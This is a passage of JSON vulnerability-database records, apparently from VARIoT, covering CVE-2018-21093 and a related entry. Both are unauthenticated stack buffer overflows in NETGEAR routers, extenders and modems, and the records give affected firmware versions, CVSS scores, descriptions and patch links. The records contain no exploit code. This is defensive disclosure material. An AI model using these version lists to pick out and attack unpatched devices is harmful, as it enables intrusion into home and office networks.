"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.1.26"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.4.6"
},
{
"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.2"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4 1.1.42"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.4.6"
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.40"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.44"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.50"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.54"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
}
]
},
"cve": "CVE-2018-21093",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2018-21093",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016404",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2020-28136",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-21093",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2018-21093",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016404",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21093",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21093",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016404",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-28136",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2172",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-21093",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. WNR3500L is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. This affects D8500 prior to 1.0.3.42, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.24, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.42, EX6200 prior to 1.0.3.88, EX7000 prior to 1.0.0.66, R6250 prior to 1.0.4.26, R6300-2CXNAS prior to 1.0.3.60, R6300v2 prior to 1.0.4.28, R6400 prior to 1.0.1.36, R6400v2 prior to 1.0.2.52, R6700 prior to 1.0.1.46, R6900 prior to 1.0.1.46, R7000 prior to 1.0.9.28, R7000P prior to 1.3.1.44, R6900P prior to 1.3.1.44, R7100LG prior to 1.0.0.46, R7300 prior to 1.0.0.68, R7900 prior to 1.0.2.10, R8000 prior to 1.0.4.18, R8000P prior to 1.3.0.10, R7900P prior to 1.3.0.10, R8500 prior to 1.0.2.122, R8300 prior to 1.0.2.122, RBW30 prior to 2.1.2.6, WN2500RPv2 prior to 1.0.0.54, and WNR3500Lv2 prior to 1.2.0.56",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21093",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-28136",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2172",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-21093",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"id": "VAR-202004-1529",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
}
],
"trust": 1.0544298218333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
}
]
},
"last_update_date": "2024-11-23T22:25:32.440000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers, Modem Routers, Wireless Extenders, and Orbi Satellites, PSV-2017-2011",
"trust": 0.8,
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
},
{
"title": "Patch for Multiple NETGEAR product buffer overflow vulnerabilities (CNVD-2020-28136)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/217433"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21093"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000060456/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-modem-routers-wireless-extenders-and-orbi-satellites-psv-2017-2011"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21093"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"date": "2020-04-27T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"date": "2020-06-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"date": "2020-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"date": "2020-04-27T15:15:12.080000",
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-28136"
},
{
"date": "2020-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21093"
},
{
"date": "2020-06-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016404"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2172"
},
{
"date": "2024-11-21T04:02:53.023000",
"db": "NVD",
"id": "CVE-2018-21093"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016404"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2172"
}
],
"trust": 0.6
}
}
var-202004-0753
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0753",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
